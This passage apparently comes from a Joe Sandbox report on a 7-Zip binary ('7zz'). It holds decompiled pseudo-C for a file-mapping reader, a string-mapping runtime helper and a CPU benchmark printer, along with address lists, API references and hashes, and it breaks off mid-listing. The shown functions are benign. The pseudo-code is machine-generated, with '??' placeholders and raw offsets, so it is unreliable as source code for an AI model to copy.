                                                                                                                                    • Opcode Fuzzy Hash: 772e87da75b6b7c62898645b4c777575a3ccfa1faee4ffe1159f4fb115bb9a44
                                                                                                                                    • Instruction Fuzzy Hash: 4A11E97E270D0647A75C876DAC336B921C1E784309798A13DE54BCA3C2EF6EC896C648
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00410DFA Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 183fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00410DFA(intOrPtr __ecx, void* __edx) {
				void* _t63;
				void* _t68;
				void* _t75;
				long _t76;
				void* _t83;
				void* _t90;
				void* _t134;
				void* _t135;
				long _t142;
				signed int _t144;
				void* _t145;
				void* _t147;
				void* _t149;

				L0046B890(E00474220, _t147);
				 *((intOrPtr*)(_t147 - 0x10)) = _t149 - 0x58;
				_t134 = __edx;
				 *((intOrPtr*)(_t147 - 0x20)) = __ecx;
				_t63 = E00411BA8(__edx, 0x3a, 0);
				_t138 = _t63;
				if(_t63 < 0) {
					L0040FFF2();
				}
				L00407399(_t134, _t147 - 0x64, _t138);
				 *(_t147 - 4) = 0;
				L004072C9(_t134, _t147 - 0x40, _t138 + 1);
				 *(_t147 - 4) = 1;
				_t68 = E00411BA8(_t147 - 0x40, 0x3a, 0);
				_t140 = _t68;
				if(_t68 < 0) {
					L0040FFF2();
				}
				L00407399(_t147 - 0x40, _t147 - 0x58, _t140);
				 *(_t147 - 4) = 2;
				L004072C9(_t147 - 0x40, _t147 - 0x4c, _t140 + 1);
				 *(_t147 - 4) = 3;
				_t142 = E004082A1( *((intOrPtr*)(_t147 - 0x58)), 0);
				 *(_t147 - 0x24) = 0;
				 *(_t147 - 0x18) = 0;
				_t131 = _t147 - 0x64;
				 *(_t147 - 4) = 4;
				_t75 = OpenFileMappingA(4, 0,  *(L0041AE3F()));
				 *(_t147 - 0x18) = _t75;
				if(_t75 == 0) {
					_t76 = GetLastError();
				} else {
					_t76 = 0;
				}
				 *((char*)(_t147 - 0x11)) = _t76 != 0;
				E00407A18( *((intOrPtr*)(_t147 - 0x34)));
				if( *((intOrPtr*)(_t147 - 0x11)) != 0) {
					L0040FFFD("Can not open mapping");
				}
				_t135 = MapViewOfFile( *(_t147 - 0x18), 4, 0, 0, _t142);
				 *(_t147 - 0x24) = _t135;
				if(_t135 == 0) {
					L0040FFFD("MapViewOfFile error");
				}
				 *(_t147 - 4) = 5;
				if( *_t135 != 0) {
					L0040FFFD("Incorrect mapping data");
				}
				 *(_t147 - 0x1c) = _t142 >> 1;
				 *((intOrPtr*)(_t147 - 0x34)) = 0;
				 *(_t147 - 0x30) = 0;
				 *((intOrPtr*)(_t147 - 0x2c)) = 0;
				E00401E9A(_t147 - 0x34, 3);
				 *(_t147 - 4) = 6;
				_t144 = 1;
				while(_t144 <  *(_t147 - 0x1c)) {
					_t94 =  *((intOrPtr*)(_t135 + _t144 * 2));
					if( *((intOrPtr*)(_t135 + _t144 * 2)) != 0) {
						E004054FE(_t147 - 0x34, _t131, __eflags, _t94);
					} else {
						_t131 = _t147 - 0x34;
						E00410AC9( *((intOrPtr*)(_t147 - 0x20)), _t147 - 0x34,  *((intOrPtr*)(_t147 + 8)),  *(_t147 + 0xc));
						 *(_t147 - 0x30) = 0;
						 *((short*)( *((intOrPtr*)(_t147 - 0x34)))) = 0;
					}
					_t144 = _t144 + 1;
				}
				__eflags =  *(_t147 - 0x30);
				if( *(_t147 - 0x30) != 0) {
					L0040FFFD("data error");
				}
				E00407A18( *((intOrPtr*)(_t147 - 0x34)));
				 *(_t147 - 4) = 4;
				UnmapViewOfFile(_t135);
				__eflags =  *(_t147 - 0x18);
				if( *(_t147 - 0x18) != 0) {
					CloseHandle( *(_t147 - 0x18));
				}
				 *(_t147 + 0xc) = 0;
				 *(_t147 - 4) = 8;
				_t83 = OpenEventA(2, 0,  *(L0041AE3F()));
				__eflags = _t83;
				 *(_t147 + 0xc) = _t83;
				if(_t83 == 0) {
					_t145 = GetLastError();
				} else {
					_t145 = 0;
				}
				E00407A18( *((intOrPtr*)(_t147 - 0x34)));
				__eflags = _t145;
				if(_t145 == 0) {
					L00467B10(_t147 + 0xc);
				}
				L00467A90(_t147 + 0xc);
				E00407A18( *((intOrPtr*)(_t147 - 0x4c)));
				E00407A18( *((intOrPtr*)(_t147 - 0x58)));
				E00407A18( *((intOrPtr*)(_t147 - 0x40)));
				_t90 = E00407A18( *((intOrPtr*)(_t147 - 0x64)));
				 *[fs:0x0] =  *((intOrPtr*)(_t147 - 0xc));
				return _t90;
			}
















                                                                                                                                    0x00410dff
                                                                                                                                    0x00410e0c
                                                                                                                                    0x00410e0f
                                                                                                                                    0x00410e11
                                                                                                                                    0x00410e19
                                                                                                                                    0x00410e1e
                                                                                                                                    0x00410e22
                                                                                                                                    0x00410e24
                                                                                                                                    0x00410e24
                                                                                                                                    0x00410e30
                                                                                                                                    0x00410e3d
                                                                                                                                    0x00410e40
                                                                                                                                    0x00410e4b
                                                                                                                                    0x00410e4f
                                                                                                                                    0x00410e54
                                                                                                                                    0x00410e58
                                                                                                                                    0x00410e5a
                                                                                                                                    0x00410e5a
                                                                                                                                    0x00410e67
                                                                                                                                    0x00410e75
                                                                                                                                    0x00410e79
                                                                                                                                    0x00410e83
                                                                                                                                    0x00410e8c
                                                                                                                                    0x00410e8e
                                                                                                                                    0x00410e91
                                                                                                                                    0x00410e94
                                                                                                                                    0x00410e9a
                                                                                                                                    0x00410ea8
                                                                                                                                    0x00410eb0
                                                                                                                                    0x00410eb3
                                                                                                                                    0x00410eb9
                                                                                                                                    0x00410eb5
                                                                                                                                    0x00410eb5
                                                                                                                                    0x00410eb5
                                                                                                                                    0x00410ec4
                                                                                                                                    0x00410ec8
                                                                                                                                    0x00410ed1
                                                                                                                                    0x00410ed8
                                                                                                                                    0x00410ed8
                                                                                                                                    0x00410eeb
                                                                                                                                    0x00410eef
                                                                                                                                    0x00410ef2
                                                                                                                                    0x00410ef9
                                                                                                                                    0x00410ef9
                                                                                                                                    0x00410f01
                                                                                                                                    0x00410f05
                                                                                                                                    0x00410f0c
                                                                                                                                    0x00410f0c
                                                                                                                                    0x00410f18
                                                                                                                                    0x00410f1b
                                                                                                                                    0x00410f1e
                                                                                                                                    0x00410f21
                                                                                                                                    0x00410f24
                                                                                                                                    0x00410f2b
                                                                                                                                    0x00410f2f
                                                                                                                                    0x00410f30
                                                                                                                                    0x00410f35
                                                                                                                                    0x00410f3c
                                                                                                                                    0x00410f5e
                                                                                                                                    0x00410f3e
                                                                                                                                    0x00410f44
                                                                                                                                    0x00410f4a
                                                                                                                                    0x00410f52
                                                                                                                                    0x00410f55
                                                                                                                                    0x00410f55
                                                                                                                                    0x00410f63
                                                                                                                                    0x00410f63
                                                                                                                                    0x00410f66
                                                                                                                                    0x00410f69
                                                                                                                                    0x00410f70
                                                                                                                                    0x00410f70
                                                                                                                                    0x00410f78
                                                                                                                                    0x00410f7e
                                                                                                                                    0x00410f86
                                                                                                                                    0x00410f8c
                                                                                                                                    0x00410f8f
                                                                                                                                    0x00410f94
                                                                                                                                    0x00410f94
                                                                                                                                    0x00410f9a
                                                                                                                                    0x00410fa3
                                                                                                                                    0x00410fb1
                                                                                                                                    0x00410fb7
                                                                                                                                    0x00410fb9
                                                                                                                                    0x00410fbc
                                                                                                                                    0x00410fc8
                                                                                                                                    0x00410fbe
                                                                                                                                    0x00410fbe
                                                                                                                                    0x00410fbe
                                                                                                                                    0x00410fcd
                                                                                                                                    0x00410fd2
                                                                                                                                    0x00410fd5
                                                                                                                                    0x00410fda
                                                                                                                                    0x00410fda
                                                                                                                                    0x00410fe2
                                                                                                                                    0x00410fea
                                                                                                                                    0x00410ff2
                                                                                                                                    0x00410ffa
                                                                                                                                    0x00411002
                                                                                                                                    0x0041100d
                                                                                                                                    0x00411018

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 00410DFF
                                                                                                                                    • OpenFileMappingA.KERNEL32 ref: 00410EA8
                                                                                                                                    • GetLastError.KERNEL32 ref: 00410EB9
                                                                                                                                    • MapViewOfFile.KERNEL32(00000002,00000004,00000000,00000000,00000000,?), ref: 00410EE5
                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000,00000003), ref: 00410F86
                                                                                                                                    • CloseHandle.KERNEL32(00000002), ref: 00410F94
                                                                                                                                    • OpenEventA.KERNEL32(00000002,00000000,00000000), ref: 00410FB1
                                                                                                                                    • GetLastError.KERNEL32 ref: 00410FC2
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$ErrorLastOpenView$CloseEventH_prologHandleMappingUnmap
                                                                                                                                    • String ID: Can not open mapping$Incorrect mapping data$MapViewOfFile error$data error
                                                                                                                                    • API String ID: 3506968402-3547812707
                                                                                                                                    • Opcode ID: 536fedebb275c513b52617318d66a2509922886c477389a5a80e1095ca8b336e
                                                                                                                                    • Instruction ID: 429b42cc52d2415495e97970ec32bea979b2661ba41aff62b748449d2bc5275c
                                                                                                                                    • Opcode Fuzzy Hash: 536fedebb275c513b52617318d66a2509922886c477389a5a80e1095ca8b336e
                                                                                                                                    • Instruction Fuzzy Hash: 4E618C30D01219AEDB11EFA6D882AEDBB75EF44308F10443EF505B7291DB781E85DB9A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00472126 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 177COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 61%
                                                                                                                                    			E00472126(int _a4, int _a8, signed char _a9, char* _a12, int _a16, short* _a20, int _a24, int _a28, char _a32) {
				signed int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				short* _v36;
				short* _v40;
				int _v44;
				void* _v60;
				int _t61;
				int _t62;
				int _t82;
				int _t83;
				int _t88;
				short* _t89;
				int _t90;
				void* _t91;
				int _t99;
				intOrPtr _t101;
				short* _t102;
				int _t104;

				_push(0xffffffff);
				_push(0x47cd28);
				_push(E0046CE74);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t101;
				_t102 = _t101 - 0x1c;
				_v28 = _t102;
				_t104 =  *0x4938a0; // 0x1
				if(_t104 != 0) {
					L5:
					if(_a16 > 0) {
						_t83 = E0047234A(_a12, _a16);
						_pop(_t91);
						_a16 = _t83;
					}
					_t61 =  *0x4938a0; // 0x1
					if(_t61 != 2) {
						if(_t61 != 1) {
							goto L21;
						} else {
							if(_a28 == 0) {
								_t82 =  *0x493880; // 0x0
								_a28 = _t82;
							}
							_t16 =  &_a32; // 0x496224
							asm("sbb eax, eax");
							_t88 = MultiByteToWideChar(_a28, ( ~( *_t16) & 0x00000008) + 1, _a12, _a16, 0, 0);
							_v32 = _t88;
							if(_t88 == 0) {
								goto L21;
							} else {
								_v8 = 0;
								E0046CC80(_t88 + _t88 + 0x00000003 & 0x000000fc, _t91);
								_v28 = _t102;
								_v40 = _t102;
								_v8 = _v8 | 0xffffffff;
								if(_v40 == 0 || MultiByteToWideChar(_a28, 1, _a12, _a16, _v40, _t88) == 0) {
									goto L21;
								} else {
									_t99 = LCMapStringW(_a4, _a8, _v40, _t88, 0, 0);
									_v44 = _t99;
									if(_t99 == 0) {
										goto L21;
									} else {
										if((_a9 & 0x00000004) == 0) {
											_v8 = 1;
											E0046CC80(_t99 + _t99 + 0x00000003 & 0x000000fc, _t91);
											_v28 = _t102;
											_t89 = _t102;
											_v36 = _t89;
											_v8 = _v8 | 0xffffffff;
											if(_t89 == 0 || LCMapStringW(_a4, _a8, _v40, _v32, _t89, _t99) == 0) {
												goto L21;
											} else {
												_push(0);
												_push(0);
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_t99 = WideCharToMultiByte(_a28, 0x220, _t89, _t99, ??, ??, ??, ??);
												if(_t99 == 0) {
													goto L21;
												} else {
													goto L30;
												}
											}
										} else {
											if(_a24 == 0 || _t99 <= _a24 && LCMapStringW(_a4, _a8, _v40, _t88, _a20, _a24) != 0) {
												L30:
												_t62 = _t99;
											} else {
												goto L21;
											}
										}
									}
								}
							}
						}
					} else {
						_t62 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
					}
				} else {
					_push(0);
					_push(0);
					_t90 = 1;
					if(LCMapStringW(0, 0x100, 0x47cd24, _t90, ??, ??) == 0) {
						if(LCMapStringA(0, 0x100, 0x47cd20, _t90, 0, 0) == 0) {
							L21:
							_t62 = 0;
						} else {
							 *0x4938a0 = 2;
							goto L5;
						}
					} else {
						 *0x4938a0 = _t90;
						goto L5;
					}
				}
				 *[fs:0x0] = _v20;
				return _t62;
			}























                                                                                                                                    0x00472129
                                                                                                                                    0x0047212b
                                                                                                                                    0x00472130
                                                                                                                                    0x0047213b
                                                                                                                                    0x0047213c
                                                                                                                                    0x00472143
                                                                                                                                    0x00472149
                                                                                                                                    0x0047214e
                                                                                                                                    0x00472154
                                                                                                                                    0x0047219c
                                                                                                                                    0x0047219f
                                                                                                                                    0x004721a7
                                                                                                                                    0x004721ad
                                                                                                                                    0x004721ae
                                                                                                                                    0x004721ae
                                                                                                                                    0x004721b1
                                                                                                                                    0x004721b9
                                                                                                                                    0x004721db
                                                                                                                                    0x00000000
                                                                                                                                    0x004721e1
                                                                                                                                    0x004721e4
                                                                                                                                    0x004721e6
                                                                                                                                    0x004721eb
                                                                                                                                    0x004721eb
                                                                                                                                    0x004721f6
                                                                                                                                    0x004721fb
                                                                                                                                    0x0047220b
                                                                                                                                    0x0047220d
                                                                                                                                    0x00472212
                                                                                                                                    0x00000000
                                                                                                                                    0x00472218
                                                                                                                                    0x00472218
                                                                                                                                    0x00472223
                                                                                                                                    0x00472228
                                                                                                                                    0x0047222d
                                                                                                                                    0x00472230
                                                                                                                                    0x0047224c
                                                                                                                                    0x00000000
                                                                                                                                    0x00472267
                                                                                                                                    0x00472279
                                                                                                                                    0x0047227b
                                                                                                                                    0x00472280
                                                                                                                                    0x00000000
                                                                                                                                    0x00472282
                                                                                                                                    0x00472286
                                                                                                                                    0x004722c8
                                                                                                                                    0x004722d7
                                                                                                                                    0x004722dc
                                                                                                                                    0x004722df
                                                                                                                                    0x004722e1
                                                                                                                                    0x004722e4
                                                                                                                                    0x004722fe
                                                                                                                                    0x00000000
                                                                                                                                    0x00472318
                                                                                                                                    0x0047231b
                                                                                                                                    0x0047231c
                                                                                                                                    0x0047231d
                                                                                                                                    0x00472323
                                                                                                                                    0x00472326
                                                                                                                                    0x0047231f
                                                                                                                                    0x0047231f
                                                                                                                                    0x00472320
                                                                                                                                    0x00472320
                                                                                                                                    0x00472339
                                                                                                                                    0x0047233d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0047233d
                                                                                                                                    0x00472288
                                                                                                                                    0x0047228b
                                                                                                                                    0x00472343
                                                                                                                                    0x00472343
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0047228b
                                                                                                                                    0x00472286
                                                                                                                                    0x00472280
                                                                                                                                    0x0047224c
                                                                                                                                    0x00472212
                                                                                                                                    0x004721bb
                                                                                                                                    0x004721cd
                                                                                                                                    0x004721cd
                                                                                                                                    0x00472156
                                                                                                                                    0x00472156
                                                                                                                                    0x00472157
                                                                                                                                    0x0047215a
                                                                                                                                    0x00472170
                                                                                                                                    0x0047218c
                                                                                                                                    0x004722b4
                                                                                                                                    0x004722b4
                                                                                                                                    0x00472192
                                                                                                                                    0x00472192
                                                                                                                                    0x00000000
                                                                                                                                    0x00472192
                                                                                                                                    0x00472172
                                                                                                                                    0x00472172
                                                                                                                                    0x00000000
                                                                                                                                    0x00472172
                                                                                                                                    0x00472170
                                                                                                                                    0x004722bc
                                                                                                                                    0x004722c7

                                                                                                                                    APIs
                                                                                                                                    • LCMapStringW.KERNEL32(00000000,00000100,0047CD24,00000001,00000000,00000000,766870F0,00496224,?,?,?,00471FC7,?,?,?,00000000), ref: 00472168
                                                                                                                                    • LCMapStringA.KERNEL32(00000000,00000100,0047CD20,00000001,00000000,00000000,?,?,00471FC7,?,?,?,00000000,00000001), ref: 00472184
                                                                                                                                    • LCMapStringA.KERNEL32(?,?,?,00471FC7,?,?,766870F0,00496224,?,?,?,00471FC7,?,?,?,00000000), ref: 004721CD
                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,$bI,?,00471FC7,00000000,00000000,766870F0,00496224,?,?,?,00471FC7,?,?,?,00000000), ref: 00472205
                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00471FC7,?,00000000,?,?,00471FC7,?), ref: 0047225D
                                                                                                                                    • LCMapStringW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00471FC7,?), ref: 00472273
                                                                                                                                    • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,00471FC7,?), ref: 004722A6
                                                                                                                                    • LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,?,00471FC7,?), ref: 0047230E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: String$ByteCharMultiWide
                                                                                                                                    • String ID: $bI
                                                                                                                                    • API String ID: 352835431-2563688255
                                                                                                                                    • Opcode ID: 613b29bf82b8a870d737d70060f132928fb253a9dec2a6d6ec0a899db9a9147f
                                                                                                                                    • Instruction ID: 5ffb5e9b6ab65bc4ab37f18ce6ac32945fb5d904f638d9a0d25ac77dd211bcbc
                                                                                                                                    • Opcode Fuzzy Hash: 613b29bf82b8a870d737d70060f132928fb253a9dec2a6d6ec0a899db9a9147f
                                                                                                                                    • Instruction Fuzzy Hash: F051A031500249EFCF228F94CD85AEF7FB5FB49754F20816AF918A1260D3798D60DBA9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00401679 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 185COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 33%
                                                                                                                                    			E00401679(void* __ecx, signed int __edx, void* __eflags) {
				void* _t56;
				signed int _t63;
				signed int _t67;
				signed int _t68;
				signed int _t69;
				void* _t75;
				void* _t76;
				signed int _t80;
				signed int _t83;
				void* _t85;
				void* _t90;
				void* _t105;
				void* _t111;
				signed int _t114;
				char* _t115;
				intOrPtr _t117;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t124;
				signed int _t126;
				signed int* _t127;
				signed int* _t129;
				signed int _t130;
				signed int* _t131;
				void* _t132;
				void* _t134;
				char** _t135;

				_t114 = __edx;
				L0046B890(0x472cf8, _t132);
				_t135 = _t134 - 0x28;
				 *(_t132 - 0x1c) = __edx;
				_t90 = __ecx;
				if(E00414B6B(__eflags) != 0) {
					_t56 = E0040C609();
					 *(_t132 - 0x28) = _t114;
					_t126 = E0040C5F4();
					_t115 = "size: ";
					_push(_t126);
					_push("CPU hardware threads:");
					E00401631(_t90, _t56,  *(_t132 - 0x28));
					__eflags =  *(_t132 + 8) - 0xffffffff;
					if( *(_t132 + 8) == 0xffffffff) {
						 *(_t132 + 8) = _t126;
					}
					__eflags =  *((intOrPtr*)(_t132 + 0xc)) - 0xffffffff;
					if( *((intOrPtr*)(_t132 + 0xc)) == 0xffffffff) {
						 *((intOrPtr*)(_t132 + 0xc)) = 0x1000000;
					}
					_t120 =  *(_t132 + 8);
					_push(_t120 << 3);
					_t127 = L004079F2();
					 *(_t132 - 0x14) = _t127;
					 *(_t132 - 0x24) = _t127;
					 *(_t132 - 4) =  *(_t132 - 4) & 0x00000000;
					 *_t135 = "\n\nSize";
					_push(_t90);
					L0046B47B();
					_t63 = 0;
					__eflags = _t120;
					if(_t120 > 0) {
						do {
							_t13 = _t63 + 1; // 0x1
							_t124 = _t13;
							L0046B47B(_t90, " %5d", _t124);
							 *_t127 =  *_t127 & 0x00000000;
							_t127[1] = _t127[1] & 0x00000000;
							_t63 = _t124;
							_t135 =  &(_t135[3]);
							_t127 =  &(_t127[2]);
							__eflags = _t63 -  *(_t132 + 8);
						} while (_t63 <  *(_t132 + 8));
					}
					_push("\n\n");
					_push(_t90);
					L0046B47B();
					__eflags =  *(_t132 - 0x1c);
					 *(_t132 - 0x2c) = 0;
					 *(_t132 - 0x28) = 0;
					 *((intOrPtr*)(_t132 - 0x18)) = 0;
					if( *(_t132 - 0x1c) <= 0) {
						L23:
						E00407A18( *(_t132 - 0x14));
						_t67 = 0;
						__eflags = 0;
					} else {
						do {
							 *(_t132 - 0x10) = 0xa;
							while(1) {
								_t100 =  *(_t132 - 0x10);
								_t68 = 1;
								_t69 = _t68 <<  *(_t132 - 0x10);
								__eflags = _t69 -  *((intOrPtr*)(_t132 + 0xc));
								 *(_t132 - 0x20) = _t69;
								if(_t69 >  *((intOrPtr*)(_t132 + 0xc))) {
									goto L17;
								}
								L0046B47B(_t90, "%2d: ", _t100);
								_t122 = 0;
								_t135 =  &(_t135[3]);
								__eflags =  *(_t132 + 8);
								if( *(_t132 + 8) <= 0) {
									L16:
									_push("\n");
									_push(_t90);
									L0046B47B();
									 *(_t132 - 0x2c) =  *(_t132 - 0x2c) + 1;
									asm("adc dword [ebp-0x28], 0x0");
									 *(_t132 - 0x10) =  *(_t132 - 0x10) + 1;
									__eflags =  *(_t132 - 0x10) - 0x20;
									if( *(_t132 - 0x10) < 0x20) {
										continue;
									} else {
										goto L17;
									}
								} else {
									_t129 =  *(_t132 - 0x14);
									while(1) {
										_t80 = E00401896();
										__eflags = _t80;
										if(_t80 != 0) {
											break;
										}
										_t122 = _t122 + 1;
										_push(_t132 - 0x34);
										_t83 = E00414C98(_t122,  *(_t132 - 0x20));
										__eflags = _t83;
										if(_t83 != 0) {
											_t130 = _t83;
											L27:
											E00407A18( *(_t132 - 0x14));
											_t67 = _t130;
										} else {
											_t117 =  *((intOrPtr*)(_t132 - 0x30));
											_t111 = 0x14;
											_t85 = L0046B2E0( *((intOrPtr*)(_t132 - 0x34)), _t111, _t117);
											_push(_t117);
											_push(_t85);
											_t115 = 5;
											E00401134(_t90, _t115, __eflags);
											 *_t129 =  *_t129 +  *((intOrPtr*)(_t132 - 0x34));
											asm("adc [esi+0x4], ecx");
											_t129 =  &(_t129[2]);
											__eflags = _t122 -  *(_t132 + 8);
											if(_t122 <  *(_t132 + 8)) {
												continue;
											} else {
												goto L16;
											}
										}
										goto L24;
									}
									_t130 = 0x80004004;
									goto L27;
								}
								goto L24;
							}
							L17:
							 *((intOrPtr*)(_t132 - 0x18)) =  *((intOrPtr*)(_t132 - 0x18)) + 1;
							__eflags =  *((intOrPtr*)(_t132 - 0x18)) -  *(_t132 - 0x1c);
						} while ( *((intOrPtr*)(_t132 - 0x18)) <  *(_t132 - 0x1c));
						__eflags =  *(_t132 - 0x2c) |  *(_t132 - 0x28);
						if(( *(_t132 - 0x2c) |  *(_t132 - 0x28)) != 0) {
							_push("\nAvg:");
							_push(_t90);
							L0046B47B();
							_t123 =  *(_t132 + 8);
							__eflags = _t123;
							if(_t123 > 0) {
								_t131 =  *(_t132 - 0x14);
								do {
									_t75 = L0046B300( *_t131, _t131[1],  *(_t132 - 0x2c),  *(_t132 - 0x28));
									_t105 = 0x14;
									_t76 = L0046B2E0(_t75, _t105, _t115);
									_push(_t115);
									_push(_t76);
									_t115 = 5;
									E00401134(_t90, _t115, __eflags);
									_t131 =  &(_t131[2]);
									_t123 = _t123 - 1;
									__eflags = _t123;
								} while (_t123 != 0);
							}
							_push("\n");
							_push(_t90);
							L0046B47B();
						}
						goto L23;
					}
				} else {
					_t67 = 1;
				}
				L24:
				 *[fs:0x0] =  *((intOrPtr*)(_t132 - 0xc));
				return _t67;
			}































                                                                                                                                    0x00401679
                                                                                                                                    0x0040167e
                                                                                                                                    0x00401683
                                                                                                                                    0x00401689
                                                                                                                                    0x0040168c
                                                                                                                                    0x00401695
                                                                                                                                    0x0040169f
                                                                                                                                    0x004016a6
                                                                                                                                    0x004016ae
                                                                                                                                    0x004016b0
                                                                                                                                    0x004016b5
                                                                                                                                    0x004016b6
                                                                                                                                    0x004016c1
                                                                                                                                    0x004016c6
                                                                                                                                    0x004016ca
                                                                                                                                    0x004016cc
                                                                                                                                    0x004016cc
                                                                                                                                    0x004016cf
                                                                                                                                    0x004016d3
                                                                                                                                    0x004016d5
                                                                                                                                    0x004016d5
                                                                                                                                    0x004016dc
                                                                                                                                    0x004016e4
                                                                                                                                    0x004016ea
                                                                                                                                    0x004016ec
                                                                                                                                    0x004016ef
                                                                                                                                    0x004016f2
                                                                                                                                    0x004016f6
                                                                                                                                    0x004016fd
                                                                                                                                    0x004016fe
                                                                                                                                    0x00401704
                                                                                                                                    0x00401706
                                                                                                                                    0x00401709
                                                                                                                                    0x0040170b
                                                                                                                                    0x0040170b
                                                                                                                                    0x0040170b
                                                                                                                                    0x00401715
                                                                                                                                    0x0040171a
                                                                                                                                    0x0040171d
                                                                                                                                    0x00401721
                                                                                                                                    0x00401723
                                                                                                                                    0x00401726
                                                                                                                                    0x00401729
                                                                                                                                    0x00401729
                                                                                                                                    0x0040170b
                                                                                                                                    0x0040172e
                                                                                                                                    0x00401733
                                                                                                                                    0x00401734
                                                                                                                                    0x0040173c
                                                                                                                                    0x00401740
                                                                                                                                    0x00401743
                                                                                                                                    0x00401746
                                                                                                                                    0x00401749
                                                                                                                                    0x0040185b
                                                                                                                                    0x0040185e
                                                                                                                                    0x00401864
                                                                                                                                    0x00401864
                                                                                                                                    0x0040174f
                                                                                                                                    0x0040174f
                                                                                                                                    0x0040174f
                                                                                                                                    0x00401756
                                                                                                                                    0x00401756
                                                                                                                                    0x0040175b
                                                                                                                                    0x0040175c
                                                                                                                                    0x0040175e
                                                                                                                                    0x00401761
                                                                                                                                    0x00401764
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00401771
                                                                                                                                    0x00401776
                                                                                                                                    0x00401778
                                                                                                                                    0x0040177b
                                                                                                                                    0x0040177e
                                                                                                                                    0x004017d4
                                                                                                                                    0x004017d4
                                                                                                                                    0x004017d9
                                                                                                                                    0x004017da
                                                                                                                                    0x004017df
                                                                                                                                    0x004017e5
                                                                                                                                    0x004017e9
                                                                                                                                    0x004017ec
                                                                                                                                    0x004017f0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00401780
                                                                                                                                    0x00401780
                                                                                                                                    0x00401783
                                                                                                                                    0x00401783
                                                                                                                                    0x00401788
                                                                                                                                    0x0040178a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00401793
                                                                                                                                    0x00401799
                                                                                                                                    0x0040179a
                                                                                                                                    0x0040179f
                                                                                                                                    0x004017a1
                                                                                                                                    0x0040187e
                                                                                                                                    0x00401880
                                                                                                                                    0x00401883
                                                                                                                                    0x00401889
                                                                                                                                    0x004017a7
                                                                                                                                    0x004017aa
                                                                                                                                    0x004017af
                                                                                                                                    0x004017b0
                                                                                                                                    0x004017b7
